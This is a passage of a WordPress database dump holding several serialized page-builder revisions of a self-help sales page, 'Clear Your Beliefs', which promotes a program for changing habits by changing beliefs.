Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:3:{s:3:"src";s:79:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:159:"<div class="parg-text"><p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"1";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:482:"<div class="parg-text"><p><strong>We literally <u>create our reality</u> with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:3:{s:3:"src";s:64:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"1";s:2:"id";s:2:"21";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:971:"<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:17:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"2";}i:15;a:1:{s:5:"cells";s:1:"2";}i:16;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:25:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"14";}i:22;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"15";}i:23;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"15";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}}}'),
(1529, 1974, 'panels_data', 'a:3:{s:7:"widgets";a:23:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:3:{s:3:"src";s:79:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:159:"<div class="parg-text"><p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"1";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:482:"<div class="parg-text"><p><strong>We literally <u>create our reality</u> with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:3:{s:3:"src";s:64:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"1";s:2:"id";s:2:"21";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:1049:"<div class="parg-img pull-left"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft"></div>\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<div class="parg-img pull-right"><img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright"></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:17:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"2";}i:15;a:1:{s:5:"cells";s:1:"2";}i:16;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:25:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"14";}i:22;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"15";}i:23;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"15";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}}}'),
(1536, 1978, 'panels_data', 'a:3:{s:7:"widgets";a:19:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to 